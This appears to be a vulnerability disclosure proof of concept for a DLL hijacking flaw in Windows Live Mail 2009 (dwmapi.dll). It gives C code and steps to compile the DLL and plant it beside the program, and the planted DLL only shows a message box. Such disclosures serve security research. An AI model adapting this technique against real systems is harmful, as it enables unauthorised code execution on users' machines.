Microsoft Windows Live Mail 2009 DLL hijacking exploit.
3a4d76dc3587f90acd688b938e668e805b8c54547837944539904e6134dcbc35
/*
==========================================================================================
Microsoft Windows Live Mail 2009 (Build 14.0.8089.0726) DLL Hijacking Exploit (dwmapi.dll)
==========================================================================================
$ Program: Microsoft Windows Live Mail
$ Version: 2009 (Build 14.0.8089.0726)
$ Download: http://download.live.com/wlmail
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as dwmapi.dll
gcc -shared -o dwmapi.dll thiscode.c
2> Move DLL file to the directory where Windows Live Mail is installed
3> Open any file recognized by Windows Live Mail
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}